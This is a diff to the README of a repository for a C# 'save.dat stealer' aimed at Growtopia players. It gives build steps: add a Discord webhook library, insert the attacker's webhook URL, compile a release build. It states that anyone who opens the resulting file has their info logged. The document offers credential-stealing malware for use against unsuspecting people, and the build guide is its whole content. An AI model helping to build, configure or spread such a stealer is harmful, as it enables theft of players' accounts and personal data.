TimeCova/simple-save.dat-stealer-growtopia/README.md

-# simple-save.dat-stealer-growtopia
-A simple save.dat stealer made in c#
+# simple save.dat stealer growtopia

+# how to build/use it

+Dependencies:
+CSharpDiscordWebhook.NET

+How to build file?
+Open in Visual Studio ( Console App )
+Change the webhook url and anything else u need to change.
+Change Build to Release then click build

+And your done!
+Anyone who opens the file will get their info logged.